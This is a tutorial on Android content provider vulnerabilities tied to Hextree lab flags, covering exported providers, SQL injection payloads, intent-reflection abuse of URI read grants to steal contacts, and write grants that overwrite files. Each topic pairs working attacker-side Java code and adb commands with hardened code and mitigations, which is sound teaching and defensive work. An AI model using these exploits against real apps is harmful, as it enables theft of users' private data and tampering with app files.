Content Providers
A content provider is the Android component for sharing an app's structured data (and, through FileProvider, its files) with other apps. Whether that sharing is actually secure depends on whether the provider is exported, which permissions guard it, and how carefully the app hands out URI grants.
Exported Content Provider
If a vulnerable app exports a content provider without protecting it with a permission, any malicious app on the device can address it by the vulnerable app's authority and run query, insert, update and delete calls against it.




ContentResolver.query takes: projection - the columns to return (null returns every column), selection - the WHERE clause (use ? placeholders that are filled from selectionArgs), sortOrder - the ORDER BY clause.
You can also query a content provider URI from adb with the content tool: adb shell content query --uri content://<authority>/<path>, which also accepts --projection, --where and --sort.
To query a particular row, if the provider's UriMatcher supports it, append the ID to the path: --uri content://<authority>/<path>/<id>.
Impact: A malicious app can read the vulnerable app's data by querying the vulnerable app's content provider.
Mitigation: Do not export the content provider unless really required (android:exported="false"). If it must be exported, guard it with android:readPermission and android:writePermission (or android:permission), and with path-permission elements where only some paths need protecting, so that only apps holding those permissions can query it.
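As an added example (not code from the page or from Hextree), this is what the malicious-app side of the query looks like. The authority com.example.vulnerable.provider, the notes path and the column names are assumptions; in practice you read them from the victim's AndroidManifest.xml provider element and from a first query with a null projection.

```java
import android.content.ContentResolver;
import android.content.ContentUris;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

// Malicious-app side: dump an exported provider. Authority, path and column
// names are assumptions for this example; take the real ones from the
// victim's <provider> element and from Cursor.getColumnNames().
public class ProviderDump {
    private static final String TAG = "ProviderDump";
    private static final Uri NOTES_URI =
            Uri.parse("content://com.example.vulnerable.provider/notes");

    public static void dumpAll(Context ctx) {
        ContentResolver cr = ctx.getContentResolver();
        String[] projection = {"_id", "title", "body"}; // columns to return (null = all columns)
        String selection = "_id > ?";                   // WHERE clause; '?' is bound from selectionArgs
        String[] selectionArgs = {"0"};
        String sortOrder = "_id DESC";                  // ORDER BY clause
        try (Cursor c = cr.query(NOTES_URI, projection, selection, selectionArgs, sortOrder)) {
            if (c == null) {
                Log.w(TAG, "provider returned no cursor (unknown URI?)");
                return;
            }
            while (c.moveToNext()) {
                StringBuilder row = new StringBuilder();
                for (int i = 0; i < c.getColumnCount(); i++) {
                    row.append(c.getColumnName(i)).append('=').append(c.getString(i)).append("  ");
                }
                Log.i(TAG, row.toString());
            }
        } catch (SecurityException e) {
            // Thrown when the provider is not exported, or requires a permission we do not hold.
            Log.e(TAG, "query denied: " + e.getMessage());
        }
    }

    // Single-row lookup, for providers whose UriMatcher accepts content://authority/notes/<id>.
    public static Cursor fetchById(Context ctx, long id) {
        Uri rowUri = ContentUris.withAppendedId(NOTES_URI, id);
        return ctx.getContentResolver().query(rowUri, null, null, null, null);
    }
}
```

The same request from a shell, for the same assumed authority: adb shell content query --uri content://com.example.vulnerable.provider/notes --projection _id:title:body --where "_id>0" --sort "_id DESC", and --uri content://com.example.vulnerable.provider/notes/1 for one row. If the provider is not exported, or carries a readPermission the caller lacks, both the Java call and the adb command fail with a SecurityException; that is the check to re-run after applying the mitigation.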
SQL injection in Content Provider
When an attacker-controlled parameter (projection, selection, sortOrder, or a URI path segment) is concatenated into the SQL string the provider builds, the provider is open to SQL injection: the caller can escape the intended WHERE clause or read other tables, including sqlite_master for the schema.



Impact: The attacker app can read parts of the database (other rows, other tables, the schema) that the content provider implementation never intended to expose.
Mitigation: Never concatenate caller-supplied strings into SQL. Pass values through selectionArgs so SQLite binds them as parameters, build statements with SQLiteQueryBuilder, whitelist columns with a projection map, and enable setStrict(true) so the caller's selection is parenthesised and validated.
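The following added example (not the page's or Hextree's code) puts an injectable provider query() next to a hardened one. The notes table, its visible column and the column names are assumptions; the intended behaviour is that callers only ever see rows with visible = 1.

```java
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.text.TextUtils;
import java.util.HashMap;
import java.util.Map;

// Assumed schema: notes(_id, title, body, visible). Callers may only see visible = 1.
public class NotesQueries {

    // VULNERABLE: projection, selection and sortOrder are pasted straight into SQL.
    public static Cursor queryVulnerable(SQLiteDatabase db, String[] projection,
                                         String selection, String sortOrder) {
        String cols = (projection == null) ? "*" : TextUtils.join(",", projection);
        String sql = "SELECT " + cols + " FROM notes WHERE visible = 1";
        if (!TextUtils.isEmpty(selection)) sql += " AND " + selection;    // injectable
        if (!TextUtils.isEmpty(sortOrder)) sql += " ORDER BY " + sortOrder; // injectable
        // Payloads a malicious caller can send through ContentResolver.query:
        //   selection  = "1=0 OR 1=1"                  -> AND binds tighter, so hidden rows leak
        //   projection = {"* FROM sqlite_master -- "}  -> dumps the schema; "-- " comments out the rest
        return db.rawQuery(sql, null);
    }

    // HARDENED: fixed table and WHERE fragment, whitelisted columns, bound arguments.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static {
        PROJECTION_MAP.put("_id", "_id");
        PROJECTION_MAP.put("title", "title");
        PROJECTION_MAP.put("body", "body");
    }

    public static Cursor queryHardened(SQLiteDatabase db, String[] projection, String selection,
                                       String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("notes");
        qb.setProjectionMap(PROJECTION_MAP);   // a column not in the map throws IllegalArgumentException
        qb.setStrict(true);                    // caller's selection is parenthesised and test-executed
        qb.appendWhere("visible = 1");         // the caller cannot remove this constraint
        // Values travel in selectionArgs and are bound by SQLite, never interpolated.
        return qb.query(db, projection, selection, selectionArgs, null, null, safeSortOrder(sortOrder));
    }

    // Strict mode on older releases does not cover sortOrder, so whitelist it ourselves:
    // a known column, optionally followed by ASC or DESC, and nothing else.
    static String safeSortOrder(String sortOrder) {
        if (TextUtils.isEmpty(sortOrder)) return null;
        String[] parts = sortOrder.trim().split("\\s+");
        boolean directionOk = parts.length == 1 || (parts.length == 2
                && (parts[1].equalsIgnoreCase("ASC") || parts[1].equalsIgnoreCase("DESC")));
        if (!directionOk || !PROJECTION_MAP.containsKey(parts[0])) {
            throw new IllegalArgumentException("Illegal sort order: " + sortOrder);
        }
        return sortOrder.trim();
    }
}
```

With the hardened version the "1=0 OR 1=1" payload still runs, but inside parentheses ANDed to visible = 1, so it cannot widen the result set, and the sqlite_master projection is rejected before any SQL is built. On API 30 and later you can additionally call setStrictColumns(true) and setStrictGrammar(true) on the builder.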
FLAG_GRANT_READ_URI_PERMISSION flag set in Intent

Even if the provider is not exported, an Intent carrying FLAG_GRANT_READ_URI_PERMISSION (value 1) whose data or ClipData points at a content:// URI grants the recipient read access to that URI. The grant is made with the sender's identity, so it succeeds whenever the sending app can read the URI and the provider allows grants (android:grantUriPermissions, or a grant-uri-permission element).


If the vulnerable app has an intent reflection vulnerability, i.e. it takes an Intent supplied by the attacker and sends it on with startActivity (or similar) without checking whether the attacker set FLAG_GRANT_READ_URI_PERMISSION, the grant is made with the vulnerable app's identity and the attacker gains access to the provider even though it is not exported.
In the example below the vulnerable app holds the READ_CONTACTS permission for the Android Contacts content provider while the malicious app does not; the malicious app abuses the intent reflection vulnerability in the vulnerable app to read the contacts.



Impact: A malicious app can access content providers the vulnerable app can reach (its own non-exported providers, or system providers it holds permissions for) without those providers being exported.
Mitigation: Validate the calling package name and class name before forwarding an Intent with FLAG_GRANT_READ_URI_PERMISSION, and strip the grant flags (and ClipData) from any Intent you did not build yourself. Do not set FLAG_GRANT_READ_URI_PERMISSION unless really necessary.
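An added example of the contacts scenario, written for this page rather than taken from it or from Hextree. The vulnerable app's package com.example.vulnerable and its ReflectActivity, the "next" extra name and the attacker's GrantReceiverActivity are assumptions; ContactsContract.Contacts.CONTENT_URI is the real contacts provider URI. Each class belongs in its own file, and the two halves are two different apps.

```java
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.provider.ContactsContract;
import android.util.Log;

// --- Vulnerable app (holds READ_CONTACTS). Package, class and extra name are assumed. ---
// This exported activity forwards whatever Intent it finds in the "next" extra.
// startActivity() re-sends it under the vulnerable app's identity, so a
// FLAG_GRANT_READ_URI_PERMISSION the attacker set is honoured against the
// vulnerable app's URI access, not the attacker's.
public class ReflectActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent next = getIntent().getParcelableExtra("next");
        if (next != null) {
            startActivity(next); // flags, data URI and ClipData are all preserved
        }
        finish();
    }
}

// --- Malicious app (no contacts permission). ---
public class ContactsReflectAttack {
    static final Uri CONTACTS = ContactsContract.Contacts.CONTENT_URI; // content://com.android.contacts/contacts

    public static void launch(Context ctx) {
        // Inner intent: targets our own receiver and names the URI we want granted.
        Intent inner = new Intent();
        inner.setClassName(ctx.getPackageName(), ctx.getPackageName() + ".GrantReceiverActivity");
        inner.setData(CONTACTS);
        inner.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); // == 1

        // Outer intent: delivered to the vulnerable activity, which reflects the inner one.
        Intent outer = new Intent();
        outer.setClassName("com.example.vulnerable", "com.example.vulnerable.ReflectActivity");
        outer.putExtra("next", inner);
        ctx.startActivity(outer);
    }
}

// Receives the reflected Intent. Because the grant was made by the vulnerable app,
// this activity can read the URI although the malicious app lacks READ_CONTACTS.
public class GrantReceiverActivity extends Activity {
    private static final String TAG = "GrantReceiverActivity";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri granted = getIntent().getData();
        String[] projection = {ContactsContract.Contacts.DISPLAY_NAME};
        try (Cursor c = getContentResolver().query(granted, projection, null, null, null)) {
            while (c != null && c.moveToNext()) {
                Log.i(TAG, "contact: " + c.getString(0));
            }
        } catch (SecurityException e) {
            // No grant arrived: the flag was stripped, or the provider forbids grants.
            Log.e(TAG, "no grant received: " + e.getMessage());
        }
        finish();
    }
}
```

The grant applies to the exact URI in getData() (and to any ClipData URIs), so the receiver must query the same URI it asked for; it lasts while the receiving activity is alive. Querying the contacts URI from the malicious app directly, without the reflected grant, is the control test and must fail with a SecurityException.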
Vulnerable File Providers
Content providers not only expose databases. A FileProvider (a ContentProvider subclass) serves files from directories listed in a res/xml paths file, and a grant on one of its URIs lets a malicious app open the vulnerable app's files. The name segment in the URI is the name attribute of the xml entry; the rest of the URI path is resolved relative to the directory that entry points at.
Sample FileProvider URI for a files-path entry in filepaths.xml: content://io.hextree.files/flag_files/flag34.txt
Original file location: /data/data/io.hextree.attacksurface/files/flags/flag34.txt (files-path is anchored at the app's files directory, so here flag_files stands for files/flags/)
Sample FileProvider URI for a root-path entry in rootpaths.xml: content://io.hextree.root/root_files/data/data/io.hextree.attacksurface/flag35.txt
Original file location: /data/data/io.hextree.attacksurface/flag35.txt (root-path is anchored at /, so everything after root_files is an absolute path and the URI can address any file the vulnerable app itself can open)




FLAG_GRANT_WRITE_URI_PERMISSION flag set in Intent
Even if the provider is not exported, an Intent with FLAG_GRANT_WRITE_URI_PERMISSION (value 2), or with FLAG_GRANT_READ_URI_PERMISSION|FLAG_GRANT_WRITE_URI_PERMISSION (value 3), grants the recipient write access to the URI.
That is, the recipient of the Intent will be able to write into the vulnerable app's database (insert, update, delete) or files (openOutputStream).




Impact: A malicious app can write into the vulnerable app's database or files; overwriting files the vulnerable app later loads or executes, such as native libraries, may lead to code execution in the vulnerable app.
Mitigation: Validate the calling package name and class name before forwarding an Intent with FLAG_GRANT_WRITE_URI_PERMISSION, and strip the grant flags (and ClipData) from any Intent you did not build yourself. Do not set FLAG_GRANT_WRITE_URI_PERMISSION unless really necessary.
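One added example serves both the file provider section above and this write-flag section; it is not code from the page or from Hextree. The first class is the malicious-app side once a reflected Intent carrying a write grant has arrived (the URI comes from the receiving activity's getIntent().getData()); the second is the check the reflecting component in the vulnerable app should have done. The files-path mapping in the comment is inferred from the page's sample URI and its original location, and the trusted package name is an assumption.

```java
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import java.io.IOException;
import java.io.OutputStream;

// Malicious-app side: abuse a URI grant that includes the write flag (2 or 3).
public class WriteGrantAbuse {
    // Sample URI from the page. A <files-path name="flag_files" path="flags/"/> entry
    // in filepaths.xml (mapping inferred from the page, not verified) makes FileProvider
    // resolve "flag_files/flag34.txt" to <filesDir>/flags/flag34.txt.
    static final Uri FLAG_FILE = Uri.parse("content://io.hextree.files/flag_files/flag34.txt");

    // FileProvider accepts "w", "wt", "wa", "rw" and "rwt" when the caller holds a write grant.
    public static void overwriteFile(Context ctx, Uri granted, byte[] payload) throws IOException {
        try (OutputStream out = ctx.getContentResolver().openOutputStream(granted, "wt")) {
            if (out == null) throw new IOException("provider refused to open " + granted);
            out.write(payload);
        }
    }

    // Database-backed providers are written through insert()/update()/delete() instead;
    // "column" and "value" are whatever the victim's schema uses.
    public static int tamperRow(Context ctx, Uri grantedRow, String column, String value) {
        ContentValues cv = new ContentValues();
        cv.put(column, value);
        return ctx.getContentResolver().update(grantedRow, cv, null, null);
    }
}

// Vulnerable-app side: what a component must do before re-sending an Intent it did not build.
public class ForwardGuard {
    static final int ALL_GRANT_FLAGS = Intent.FLAG_GRANT_READ_URI_PERMISSION   // 1
            | Intent.FLAG_GRANT_WRITE_URI_PERMISSION                           // 2
            | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
            | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION;

    // callingPackage is Activity.getCallingPackage(). It is only non-null when the caller
    // used startActivityForResult(), so null must be treated as untrusted. Check
    // getCallingActivity() the same way if a specific class is expected.
    public static Intent sanitize(Intent incoming, String callingPackage, String trustedPackage) {
        if (callingPackage == null || !callingPackage.equals(trustedPackage)) {
            return null; // refuse to forward on behalf of an unknown caller
        }
        Intent out = new Intent(incoming);
        out.removeFlags(ALL_GRANT_FLAGS); // API 23+; on older releases rebuild the Intent from scratch
        out.setClipData(null);            // ClipData URIs are granted too, not only getData()
        return out;
    }
}
```

Against the root-path provider from the page (content://io.hextree.root/root_files/...), the same overwriteFile call reaches any path under / that the vulnerable app can write, which is what turns a write grant into the file-replacement scenario described above. The guard drops every grant flag rather than only the one the page names, because FLAG_GRANT_PREFIX_URI_PERMISSION would otherwise extend a single grant to a whole URI subtree.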
Vulnerable File Provider Receivers